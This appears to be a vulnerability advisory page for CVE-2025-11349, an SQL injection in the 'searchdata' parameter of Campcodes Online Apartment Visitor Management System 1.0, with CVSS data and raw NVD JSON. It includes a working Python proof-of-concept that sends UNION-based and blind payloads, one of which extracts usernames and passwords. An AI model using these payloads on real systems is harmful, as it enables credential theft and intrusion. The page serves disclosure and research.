Security Vulnerability Report
中文
CVE-2025-11349 CVSS 7.3 HIGH

CVE-2025-11349

Published: 2025-10-07 04:16:16
Last Modified: 2026-04-29 01:00:02
Source: [email protected]

Description

A vulnerability was identified in Campcodes Online Apartment Visitor Management System 1.0. Impacted is an unknown function of the file /search-visitor.php. The manipulation of the argument searchdata leads to sql injection. The attack may be initiated remotely. The exploit is publicly available and might be used.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:campcodes:online_apartment_visitor_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE
Campcodes Online Apartment Visitor Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11349 - Campcodes Online Apartment Visitor Management System SQL Injection PoC # Vulnerability: SQL Injection in /search-visitor.php via 'searchdata' parameter # Author: arpcyber040 import requests import sys TARGET_URL = "http://target.com/search-visitor.php" def check_sql_injection(url): """Check if the target is vulnerable to SQL injection""" # Test payload for boolean-based SQL injection payload = "' OR '1'='1" params = {"searchdata": payload} try: response = requests.get(url, params=params, timeout=10) if response.status_code == 200: # Check if response contains visitor data (indicates injection worked) if "visitor" in response.text.lower() or "name" in response.text.lower(): print(f"[+] Target appears vulnerable: {url}") return True return False except Exception as e: print(f"[-] Error: {e}") return False def exploit_sql_injection(url): """Exploit SQL injection to extract database information""" # Extract database version using UNION-based injection payloads = [ # Basic test "' OR '1'='1' -- ", # UNION-based injection to extract database name "' UNION SELECT 1,2,3,database(),5,6,7,8,9,10-- ", # Extract table names "' UNION SELECT 1,2,group_concat(table_name),4,5,6,7,8,9,10 FROM information_schema.tables WHERE table_schema=database()-- ", # Extract user credentials "' UNION SELECT 1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10 FROM users-- ", # Time-based blind injection test "' OR IF(1=1, SLEEP(5), 0)-- " ] for i, payload in enumerate(payloads): try: params = {"searchdata": payload} response = requests.get(url, params=params, timeout=30) print(f"[*] Payload {i+1} response length: {len(response.text)}") if i == 4: # Check for time-based injection import time start = time.time() requests.get(url, params=params, timeout=30) elapsed = time.time() - start if elapsed > 4: print(f"[+] Time-based SQL injection confirmed (delay: {elapsed:.2f}s)") except Exception as e: print(f"[-] Payload {i+1} failed: {e}") if __name__ == "__main__": if len(sys.argv) > 1: target = sys.argv[1] else: target = TARGET_URL print(f"[*] Testing target: {target}") if check_sql_injection(target): exploit_sql_injection(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11349", "sourceIdentifier": "[email protected]", "published": "2025-10-07T04:16:15.703", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in Campcodes Online Apartment Visitor Management System 1.0. Impacted is an unknown function of the file /search-visitor.php. The manipulation of the argument searchdata leads to sql injection. The attack may be initiated remotely. The exploit is publicly available and might be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:campcodes:online_apartment_visitor_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "439FB449-F30E-4681-ADD7-F7BEF11F0D24"}]}]}], "references": [{"url": "https://github.com/arpcyber040/CVE/issues/4", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://vuldb.com/?ctiid.327234", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327234", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.664907", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.campcodes.com/", "source": "[email protected]", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.